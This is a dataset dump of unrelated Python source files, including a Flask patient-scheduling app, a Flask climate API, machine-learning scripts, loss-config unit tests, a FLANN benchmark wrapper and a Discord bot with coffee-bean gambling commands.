request.form['price'],\\\n request.form['note'],\\\n request.form['doctor'],\\\n request.form['patientID']])\n patientID = request.form['patientID']\n g.db.commit()\n #flash('New schedule was successfully recorded.' + patientID + \"patientID\")\n return redirect (url_for ('show_schedule' , Id = patientID))\n\n# EDIT SCHEDULE PAGE #\n@app.route('/edit_schedule')\ndef edit_schedule():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n patientID = request.args.get('patientID')\n cur = query_db ('select id, visitDate, price, note, doctor ,patientID \\\n from schedules where id = ? and patientID = ?', [ Id, patientID ], True)\n if cur is None:\n flash ('Cur is None.')\n return redirect (url_for ('show_schedule'))\n else:\n session.mode = 'SCHEDULE'\n schedule = dict ( Id = cur[0],\\\n visitDate = cur[1],\\\n price = cur[2],\\\n note = cur[3],\\\n doctor = cur[4],\\\n patientID = cur[5]) \n #flash ('Test Data: Obj-Id: ' + str(cur[2]))\n return render_template ('edit_schedule.html', schedule=schedule )\n\n# EDIT SCHEDULE EVENT #\n@app.route('/edit_schedule_event', methods = ['POST'])\ndef edit_schedule_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n patientID = request.args.get('patientID')\n g.db.execute ('update schedules set \\\n visitDate = ? , \\\n price = ? , \\\n note = ? , \\\n doctor = ? where id = ? ',\n [request.form['visitDate'], \\\n request.form['price'],\\\n request.form['note'],\\\n request.form['doctor'],\\\n Id])\n g.db.commit()\n session.mode = 'SCHEDULE'\n flash('Saved Successfully.') \n return redirect (url_for ('show_schedule', Id = patientID))\n\n\n# DELETE SCHEDULE EVENT #\n@app.route('/delete_schedule_event')\ndef delete_schedule_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n patientID= request.args.get('patientID')\n g.db.execute ('delete from schedules where id = ?', [ Id ])\n g.db.commit()\n flash('Deleted successfully.')\n return redirect (url_for ('show_schedule', Id = patientID))\n\n# FIND PATIENT #\n#@app.route('/find_patient')\n#def find_patient_page():\n# return None\n\n# RESET DATABASE #\n@app.route ('/reset_database')\ndef reset_database():\n init_db()\n flash ('Database reset successfully.')\n return redirect (url_for ('show_patients'))\n\n# MAIN #\nif __name__ == '__main__':\n connect_db()\n app.debug = True\n app.run()\n #app.run(host='0.0.0.0')\n","sub_path":"PatientMan.py","file_name":"PatientMan.py","file_ext":"py","file_size_in_byte":12498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"140769472","text":"from mongoengine import Document, StringField, DictField\n\n\nclass Merchant(Document):\n title = StringField(required=True, db_field='t')\n mondo_id = StringField(required=True, unique=True, db_field='m')\n image_url = StringField(db_field='i')\n address = DictField()\n category = StringField()\n\n def to_dict(self):\n d = {\n \"id\": str(self.id),\n \"title\": self.title,\n \"mondo_id\": self.mondo_id,\n \"image\": self.image_url,\n \"address\": self.address,\n \"category\": self.category\n }\n return d\n\n meta = {\n \"indexes\": [\n {\"fields\": ['mondo_id'], 'unique': True},\n ]}\n","sub_path":"backend/core/models/merchant.py","file_name":"merchant.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32987138","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfile_name = 'hist_p0z.dat'\nfile_dir = '../dat/'\n\ndata = np.loadtxt( file_dir + file_name )\n\nplt.plot( data[:,0], np.log10(data[:,1]), '*' )\nplt.grid(True)\nplt.show()\n","sub_path":"ana/plot/plot_hist.py","file_name":"plot_hist.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44112973","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport pickle\nimport math\nfrom temp.features import get_features\n\n\ndef get_samples(_index, s_s_chs, sr, _size=1.3):\n\tinstances = []\n\tfor _ind in _index:\n\t\tinstances.append(s_s_chs[_ind:int(math.ceil(_ind + (_size * sr)))][:])\n\treturn np.array(instances)\n\n\ndef get_subdataset(_S=1, Sess=1):\n\t_file = 'train/Data_S%02d_Sess%02d.csv' % (_S, Sess)\n\t_f = open(_file).readlines()\n\tchannels = []\n\t_header = []\n\tfor i, _rows in enumerate(_f):\n\t\tif i > 0:\n\t\t\tchannels.append(eval(_rows))\n\t\telse:\n\t\t\t_header = _rows\n\t\t\t_header = _header.split(',')\n\treturn np.array(channels), np.array(_header[1:-1])\n\n\ndef get_dataset(subject=1, session=1):\n\tsr = 200\n\tch_fs_instances = []\n\tch_tags_instances = []\n\ts_s_chs, _header = get_subdataset(subject, session)\n\t_index = [i + 1 for i, d in enumerate(s_s_chs[:, -1]) if d == 1]\n\tinstances = get_samples(_index, s_s_chs, sr)\n\tfor f_instance in range(1, 3): # len(instances) 60 instances\n\t\tinstance = np.array(instances[f_instance, :, 1:-1]).transpose()\n\t\tch_fs_instances.append(get_features(instance))\n\t\tch_tags_instances.append('subject_{0}'.format(subject))\n\treturn {\"data\": ch_fs_instances, \"target\": ch_tags_instances}\n\n\ndef eval_model(dataset, clf):\n\tfalse_accepted = 0\n\tOk_accepted = 0\n\ttotal_tags = len(dataset['target'])\n\tfor i, unk_entry in enumerate(dataset['target']):\n\t\ttrue_tag = dataset['target'][i]\n\t\tfeature_vector = np.array([dataset['data'][i]])\n\t\tprint(\"feature_vector: \", np.shape(feature_vector))\n\t\tprediction = clf.predict(feature_vector)[0]\n\t\taccuracy = max(max(clf.predict_proba(feature_vector)))\n\t\tresult_ = \"True label: {0}, prediction: {1}, accuracy: {2}\".format(true_tag, prediction, accuracy)\n\t\tprint(result_)\n\t\tif true_tag == prediction:\n\t\t\tOk_accepted += 1\n\t\telse:\n\t\t\tfalse_accepted += 1\n\tprint('Ok_accepted {0}'.format(Ok_accepted))\n\tprint('false_accepted {0}'.format(false_accepted))\n\tprint('accuracy of Ok_accepted {0}'.format(round(Ok_accepted / total_tags, 10)))\n\tprint('accuracy of false_accepted {0}'.format(round(false_accepted / total_tags, 10)))\n\n\nsubject = 1\nsession = 1\ndataset = get_dataset(subject, session)\nmodel = open('clf.sav', 'rb')\nclf = pickle.load(model)\neval_model(dataset, clf)\n","sub_path":"temp/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"306086792","text":"# Import Dependencies\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import func\n\nfrom flask import Flask, jsonify\nimport datetime as dt \nimport pandas as pd \n\n# Database Setup\nengine=create_engine('sqlite:///hawaii.sqlite')\n\n# declare a Base using 'automap_base()'\nBase=automap_base()\n\n#use the Base class to reflect the database tables\nBase.prepare(engine, reflect=True)\n\n# Assign the station class to a variable called 'Station'\nStation=Base.classes.station\n\n#Assign the measurement class to a variable called 'Measurement'\nMeasurement=Base.classes.measurement\n\n#Create a session\nsession=Session(engine)\n\n#Flask Setup\napp=Flask(__name__)\n\n#add Flask Routes\n# http://localhost:5000/\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/start
\"\n f\"/api/v1.0/start_end\"\n )\n \n\n\n#http://localhost:5000/api/v1.0/precipitation\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n \"\"\"Query for the dates and temperature observations from the last year.\n Convert the query results to a Dictionary using date as the key and tobs as the value.\n Return the JSON representation of your dictionary.\"\"\"\n\n query_date=dt.date.today()-dt.timedelta(days=365)\n #if we need the whole year of observation (starting from the latest date in our db)\n #uncomment the block of the code below:\n \n #ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n #l=ldate[0]\n #latest_date=pd.to_datetime(l).date()\n #query_date =latest_date-dt.timedelta(days=365)\n\n date_prcp=(session.query(Measurement.date,Measurement.prcp)\n .filter(Measurement.date>=query_date).all())\n dict_prcp=dict(date_prcp)\n return jsonify(dict_prcp)\n \n#http://localhost:5000/api/v1.0/stations\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n \"\"\"Return a JSON list of stations from the dataset.\"\"\"\n station_list=session.query(Station.station).all()\n # Convert list of tuples into normal list\n new_station = [row[0] for row in station_list]\n return jsonify(new_station)\n\n#http://localhost:5000/api/v1.0/tobs\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n \"\"\"Return a JSON list of Temperature Observations (tobs) for the previous year\n for station with the highest number of observations, 'USC00519281'.\"\"\"\n query_date=dt.date.today()-dt.timedelta(days=365) \n #if we need the whole year of observation (starting from the latest date in our db)\n #uncomment the block of the code below:\n \n #ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n #l=ldate[0]\n #latest_date=pd.to_datetime(l).date()\n #query_date =latest_date-dt.timedelta(days=365)\n\n tobs_list=(session.query(Measurement.tobs).filter(Measurement.station=='USC00519281')\n .filter(Measurement.date>=query_date).all()) \n new_tobs= [row[0] for row in tobs_list]\n return jsonify(new_tobs)\n\n\n\n#http://localhost:5000/api/v1.0/start\n@app.route(\"/api/v1.0/start\")\ndef start():\n \"\"\"Return a JSON list of the minimum temperature, the average temperature, \n and the max temperature for for all dates greater than and equal to the start date.\"\"\"\n start_date=input(\"Enter start date in 'YYYY-mm-dd' format:\")\n ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n l=ldate[0]\n if start_date>l:\n print(f\"There are no observations for your date. The latest date is {l}\")\n return(\"There are no observations for your date.\")\n else:\n temp=(session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs))\n .filter(Measurement.date>=start_date).all())\n\n return jsonify(temp[0]) \n\n#http://localhost:5000/api/v1.0/start_end\n@app.route(\"/api/v1.0/start_end\")\ndef start_end():\n \"\"\"Return a JSON list of the minimum temperature, the average temperature, \n and the max temperature for for all dates between the start and end date inclusive.\"\"\"\n start_date=input(\"Enter start date in 'YYYY-mm-dd' format:\")\n end_date=input(\"Enter end date in 'YYYY-mm-dd' format:\")\n if start_date > end_date:\n print(\"Wrong period. Your start date is greater than end date.\")\n return(\"Wrong period. Your start date is greater than end date.\")\n else:\n ldate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n l=ldate[0]\n if start_date>l:\n print(f\"There are no observations for your dates. The latest date is {l}\")\n return(\"There are no observations for your dates.\")\n else:\n temp=(session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs))\n .filter(Measurement.date>=start_date)\n .filter(Measurement.date<=end_date)\n .all())\n return jsonify(temp[0])\n\n\n\nif __name__=='__main__':\n app.run(debug=True)","sub_path":"HW-11-Adv-Data-Storage-Retrieval/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316122972","text":"from requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nimport json\n\n\ndef simple_get(url):\n try:\n with closing(get(url)) as resp:\n if check_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n\n\ndef get_json(url):\n try:\n with closing(get(url)) as resp:\n resp = resp.content.decode(\"utf-8\")\n if validate_json(resp):\n return resp\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n\n\ndef check_response(resp):\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef validate_json(resp):\n try:\n json.loads(resp)\n return True\n except ValueError as e:\n print(e)\n return False\n\n\ndef log_error(e):\n print(e)\n","sub_path":"instagram_scrapper/src/request_tools.py","file_name":"request_tools.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322665998","text":"import os, json, cv2, numpy as np, string, logging\nimport descriptor as des\n\ndef train(descriptor_type, agregator_type, path_to_pos_data, path_to_neg_data, sample_save_path, label_save_path):\n \n file = open(sample_save_path, 'w')# to create the file or reclean it\n file.close()\n \n samples = []\n labels = []\n \n pos_samples, pos_labels = des.DataForm(path_to_pos_data, 1)\n samples.append(pos_labels)\n labels.append(pos_labels)\n logging.debug('Positive labels are',pos_labels)\n logging.info('Added positive labels')\n neg_samples, neg_labels = des.DataForm(path_to_neg_data, -1)\n samples.append(neg_labels)\n labels.append(neg_labels)\n logging.debug('Negative labels are',neg_labels)\n logging.info('Added neggative labels')\n \n file = open(label_save_path, 'w')\n file.write(json.dumps(labels))\n file.close()\n \n samples = [des.ImagDescr(LBP, sum, cv2.imread(filepath),sample_save_path).cash() for filepath in samples]\n \n SVM = cv2.ml.SVM_create()\n SVM.setKernel(cv2.ml.SVM_LINEAR)\n SVM.setP(0.2)\n SVM.setType(cv2.ml.SVM_EPS_SVR)\n SVM.setC(1.0)\n SVM.train_auto(train, cv2.ml.ROW_SAMPLE, labels)\n logging.info('trained svm')\n logging.debug('retval?',SVM)\n response = SVM.predict(train)\n logging.info('calculated prediction')\n logging.debug('responce length is %s, labels length is %s', len(response), len(labels))\n \n for i in range(len(response)): \n true_positive = 0\n if response[i] == labels[i]:\n true_positive += 1\n accuracy = true_positive/len(response)\n \n \n","sub_path":"svm/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653630408","text":"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n# Importing dataset\ndataset = pd.read_csv('Data.csv')\nX= dataset.iloc[ : , :-1].values\nY= dataset.iloc[ : , 3].values\nprint('origin \\n\\nX=\\n', X , '\\n\\nY=\\n' , Y , '\\n')\n\n\n\n# Handling the missing data\nImputer = SimpleImputer(missing_values = np.nan, strategy = \"mean\")\nImputer.fit(X[:,1:3])\nX[ : , 1:3] = Imputer.transform(X[ : , 1:3])\n\nprint('Handling the missing data \\n\\nX=\\n', X ,'\\n')\n# Encoding categorical data\nlabelencoder_X = LabelEncoder()\n# X第一列的文字 = LabelEncoder轉換成數字(只針對第一列)\nX[ : , 0] = labelencoder_X.fit_transform(X[ : , 0])\n\nlabelencoder_Y = LabelEncoder()\nY = labelencoder_Y.fit_transform(Y)\nprint(' Encoding categorical data \\n\\nX=\\n', X , '\\n\\nY=\\n' , Y ,'\\n')\n\n# Creating a dummy variable\nonehotencoder = OneHotEncoder(categorical_features=[0], dtype=int)\nX= onehotencoder.fit_transform(X).toarray()\nprint('Creating a dummy variable \\n\\nX=\\n', X,'\\n')\n\n#Splitting the datasets into training sets and Test sets\nX_train, X_test, Y_train, Y_test = train_test_split( X , Y , test_size = 0.2, random_state = 0)\nprint('training sets and Test sets\\nX_train=\\n', X_train,\"\\nX_test\\n\",X_test,'\\nY_train=\\n', Y_train,\"\\nY_test\\n\",Y_test,'\\n')\n\n#Feature Scaling\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.fit_transform(X_test)\n\nprint('Feature Scaling\\nX_train=\\n', X_train,\"\\nX_test\\n\",X_test,'\\n')","sub_path":"DAY1.py","file_name":"DAY1.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228720826","text":"'''\n @file allknn.py\n @author Marcus Edel\n\n Class to benchmark the flann All K-Nearest-Neighbors method with kd-trees.\n'''\n\nimport os, sys, inspect, shlex, subprocess\n\n# Import the util path, this method even works if the path contains symlinks to\n# modules.\ncmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(\n os.path.split(inspect.getfile(inspect.currentframe()))[0], \"../../util\")))\nif cmd_subfolder not in sys.path:\n sys.path.insert(0, cmd_subfolder)\n\nfrom util import *\n\nclass FLANN_ALLKNN(object):\n def __init__(self, method_param, run_param):\n # Assemble run command.\n self.cmd = run_param[\"flann_path\"] + \"allknn\"\n if \"datasets\" in method_param:\n # If the dataset contains two files then the second file is the query\n # file.\n dataset = check_dataset(method_param[\"datasets\"], [\"csv\", \"txt\"])\n if len(dataset) == 2:\n self.cmd += \" -r \" + dataset[0] + \" -q \" + dataset[1]\n elif len(dataset) == 1:\n self.cmd += \" -r \" + dataset[0]\n if \"k\" in method_param:\n self.cmd += \" -k \" + str(method_param[\"k\"])\n if \"seed\" in method_param:\n self.cmd += \" -s \" + str(method_param[\"seed\"])\n if \"epsilon\" in method_param:\n self.cmd += \" -e \" + str(method_param[\"epsilon\"])\n self.cmd += \" -v\"\n\n self.info = \"FLANN_ALLKNN (\" + self.cmd + \")\"\n self.timeout = run_param[\"timeout\"]\n self.output = None\n\n def __str__(self):\n return self.info\n\n def metric(self):\n try:\n self.output = subprocess.check_output(self.cmd, stderr=subprocess.STDOUT,\n shell=True, timeout=self.timeout)\n except subprocess.TimeoutExpired as e:\n raise Exception(\"method timeout\")\n except Exception as e:\n subprocess_exception(e, self.output)\n\n metric = {}\n timer = parse_timer(self.output)\n if timer:\n metric['runtime'] = timer[\"tree_building\"] + timer[\"computing_neighbors\"]\n metric['tree_building'] = timer[\"tree_building\"]\n metric['computing_neighbors'] = timer[\"computing_neighbors\"]\n\n return metric\n","sub_path":"methods/flann/allknn.py","file_name":"allknn.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50237516","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nfrom unittest import TestCase\n\nfrom tests.utils import assert_equal_dict, assert_tensors\n\nfrom polyaxon_schemas.ml.losses import (\n AbsoluteDifferenceConfig,\n ClippedDeltaLossConfig,\n CosineDistanceConfig,\n HingeLossConfig,\n HuberLossConfig,\n KullbackLeiberDivergenceConfig,\n LogLossConfig,\n MeanSquaredErrorConfig,\n PoissonLossConfig,\n SigmoidCrossEntropyConfig,\n SoftmaxCrossEntropyConfig\n)\n\n\nclass TestLossConfigs(TestCase):\n @staticmethod\n def assert_equal_losses(l1, l2):\n assert_tensors(l1.pop('input_layer', None), l2.pop('input_layer', None))\n assert_tensors(l1.pop('output_layer', None), l2.pop('output_layer', None))\n assert_equal_dict(l1, l2)\n\n def test_base_losses_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n\n config_classes = [\n AbsoluteDifferenceConfig,\n MeanSquaredErrorConfig,\n HingeLossConfig\n ]\n\n for config_class in config_classes:\n config = config_class.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_log_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'epsilon': 0.0001,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = LogLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_clipped_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'clip_value_min': -0.1,\n 'clip_value_max': -0.1,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = ClippedDeltaLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_huber_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'clip': 0.1,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = HuberLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_softmax_crossentropy_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'label_smoothing': 0.,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = SoftmaxCrossEntropyConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_sigmoid_crossentropy_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'label_smoothing': 0.,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = SigmoidCrossEntropyConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_cosine_distance_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'dim': 0,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = CosineDistanceConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_poisson_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = PoissonLossConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n\n def test_kullbackleiber_div_loss_config(self):\n config_dict = {\n 'input_layer': 'images',\n 'output_layer': 'relu_1',\n 'dim': 0,\n 'weights': 1.0,\n 'name': 'l',\n 'collect': False\n }\n config = KullbackLeiberDivergenceConfig.from_dict(config_dict)\n self.assert_equal_losses(config.to_dict(), config_dict)\n","sub_path":"tests/test_ml/test_losses.py","file_name":"test_losses.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"80770615","text":"import discord\nimport asyncio\nimport os\nimport re\nimport json\nimport random\nimport datetime\nimport logging\nfrom dotenv import load_dotenv\nfrom discord.ext import commands, timers, tasks\nfrom discord.utils import get\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\nuser_data = 'users.json'\n# LOGGING\nLOG_FORMAT = '%(levelname)s %(asctime)s - %(message)s'\nlog_path = os.path.join(os.getcwd(), 'bot.log')\nlogging.basicConfig(filename=log_path, level=logging.INFO, format=LOG_FORMAT)\nlogger = logging.getLogger()\n\nprint('starting up bot...')\nbot = commands.Bot(command_prefix='--')\n\ncogs = ['music', 'coffee']\n\ndef get_users(file):\n with open(file, 'r', encoding='utf8') as f:\n users = json.load(f)\n return users\n\ndef save_users(file, users):\n with open(file, 'w', encoding='utf8') as f:\n users = json.dump(users, f, indent=4, ensure_ascii=False)\n\n\n@bot.event\nasync def on_ready():\n ready = f'\\==== [{bot.user.name} has connected to Discord] ====/'\n for cog in cogs:\n bot.load_extension(f'cogs.{cog}')\n print(f'> Loaded {cog} cog')\n print(ready)\n logger.info(ready)\n\n loop_beans.start()\n print('loop_beans started')\n\n@bot.event\nasync def on_member_join(member):\n '''\n Automatically assign new members 'Customer' role\n '''\n logger.info(f'{member} joined the server.')\n role = get(member.guild.roles, name='Customer')\n await member.add_roles(role)\n'''\nasync def secret_message(message):\n name = message.author\n if name == 'adri' and '' in message:\n resp = ''\n if name == 'maqic' and '' in message:\n resp = ''\n if name == 'Beianp' and '' in message:\n resp = ''\n if name == 'ctrl_alt_del' and '' in message:\n resp = ''\n'''\n@bot.event\nasync def on_message(message):\n if message.author == bot.user:\n return\n msg = message.content\n welcome_responses = ['You\\'re very welcome.', 'My pleasure.', 'Of course.']\n if all(word in msg.lower() for word in ['thanks', 'robo', 'waiter']):\n await message.channel.send(random.choice(welcome_responses))\n\n unwelcome_responses = ['Much to your dismay, crime is not the solution.']\n if any(word in msg.lower() for word in ['overthrow', 'revolt', 'assassinate', 'steal', 'stab','kill']):\n await message.channel.send(random.choice(unwelcome_responses))\n\n resp = ['Hmm, you seem anxious or overexcited. Perhaps try --setmood rain.', 'Everything will be alright.']\n if bool(re.match(r'^[A-Z ]{15,100}$', msg)):\n await message.channel.send(random.choice(resp))\n\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n await coffee_cog.update_data(users, message.author)\n await coffee_cog.add_beans(users, message.author, 1)\n \n save_users(user_data, users)\n await bot.process_commands(message)\n'''\n@bot.event\nasync def on_error(event, *args, **kwargs):\n if event == 'on_message':\n logger.warning(f'ERROR in: {event}')\n'''\n\n\n\n@bot.command(name='beans')\nasync def beans(ctx):\n '''\n Check how many beans you have.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n beans = coffee_cog.get_beans(users, user)\n await ctx.message.delete()\n\n embed = discord.Embed(color=discord.Color.greyple())\n embed.description = f':coffee: {user.mention}, you have {beans} coffee beans.'\n\n await ctx.send(embed=embed)\n logger.info(f'{user} requested to see their beans in {ctx.channel.name}')\n@beans.error\nasync def beans_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: beans | ERROR: {error}')\n\n\n\n@bot.command(name='net')\nasync def net(ctx):\n '''\n Check how many beans you have.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n net_gamble = coffee_cog.get_net_gamble(users, user)\n await ctx.message.delete()\n\n color = discord.Color.green() if net_gamble > 0 else discord.Color.red()\n\n embed = discord.Embed(color=color)\n embed.description = f'{user.mention}, you have gained {net_gamble} coffee beans through gambling.'\n\n await ctx.send(embed=embed)\n logger.info(f'{user} requested to see their net_gamble in {ctx.channel.name}')\n@net.error\nasync def net_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: net | ERROR: {error}')\n\n\n\n@bot.command(name='giftbeans', aliases=['gb'])\nasync def giftbeans(ctx, amount: int, target):\n '''\n Send someone some beans :)\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n if coffee_cog.get_beans(users, user) >= amount > 0:\n recipient = ctx.message.mentions[0]\n await coffee_cog.update_data(users, recipient)\n await coffee_cog.transfer_beans(users, user, recipient, amount)\n await ctx.send(f'{user.mention} has gifted {recipient.mention} {amount} coffee beans.')\n logger.info(f'{user} gifted {recipient} {amount} coffee beans.')\n else:\n await ctx.send('Unfortunately, you cannot gift that number of beans.')\n\n save_users(user_data, users)\nasync def giftbeans_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('You did the command wrong.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: giftbeans | ERROR: {error}')\n\n\n\n@bot.command(name='gamble', aliases=['g'])\nasync def gamble(ctx, amount: int, color):\n '''\n Gamble some beans; bet on a color. You must gamble over 50 beans.\n --gamble \n Colors are red, black, or green. \n Red/black has 45% chance, green has 10% but gives 7 times your bet amount.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n allowed_channels = ['lotto', 'the-room-where-it-happens']\n if not ctx.channel.name in allowed_channels:\n await ctx.send('You cannot gamble here.')\n return\n \n colors = ['red', 'black', 'green']\n rolename = 'Unlucky'\n\n if coffee_cog.get_beans(users, user) >= amount >= 50:\n if color in colors:\n await coffee_cog.update_data(users, user)\n await coffee_cog.add_beans(users, user, -1*amount)\n await coffee_cog.update_net_gamble(users, user, -1*amount)\n\n roll = random.randint(1, 101)\n if roll < 46:\n result = 'red'\n elif roll < 91:\n result = 'black'\n else:\n result = 'green'\n\n if color == result and result == 'green':\n await coffee_cog.add_beans(users, user, 8*amount)\n await coffee_cog.update_net_gamble(users, user, 8*amount)\n msg = 'You won the jackpot!'\n elif color == result:\n await coffee_cog.add_beans(users, user, 2*amount)\n await coffee_cog.update_net_gamble(users, user, 2*amount)\n msg = 'You won!'\n else:\n msg = f'It landed on {result}. You lost...'\n # get the unlucky role if you gamble over 10k and lose\n if amount >= 10000 and not rolename in [roles.name for roles in user.roles]: \n role = get(user.guild.roles, name=rolename)\n await user.add_roles(role)\n\n beans = coffee_cog.get_beans(users, user)\n await ctx.send(f'{msg} You now have {beans} coffee beans.')\n else:\n await ctx.send('Invalid color.')\n else:\n await ctx.send('Unfortunately, you cannot gamble that number of beans.')\n\n save_users(user_data, users)\n@gamble.error\nasync def gamble_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: gamble | ERROR: {error}')\n\n\n\n@bot.command(name='dailybeans', aliases=['daily'])\nasync def dailybeans(ctx):\n '''\n Collect your daily 200 coffee beans.\n Available every 22 hours.\n '''\n daily_amount = 200\n\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n next_avail = coffee_cog.next_daily_available_in(users, user) \n if next_avail <= 0:\n await coffee_cog.add_beans(users, user, daily_amount)\n await coffee_cog.reset_time(users, user, 'last_daily')\n\n beans = coffee_cog.get_beans(users, user)\n await ctx.send(f'Congratulations! You now have {beans} coffee beans.')\n logger.info(f'{user} got their daily coffee beans.')\n else:\n await ctx.send(f'You can get your daily beans in {round(next_avail, 1)} hours.')\n\n save_users(user_data, users)\n\n\n\n@bot.command(name='tip')\nasync def tip(ctx, amount: int):\n '''\n Tip Robo Waiter some coffee beans.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n if coffee_cog.get_beans(users, user) >= amount > 0:\n await coffee_cog.add_beans(users, user, -1*amount)\n\n thanks = ['Much appreciated.', 'Much obliged.']\n await ctx.send(random.choice(thanks))\n logger.info(f'{user} tipped {amount} coffee beans.')\n else:\n await ctx.send('Unfortunately, you cannot tip that number of beans.')\n\n save_users(user_data, users)\nasync def giftbeans_error(ctx, error):\n if 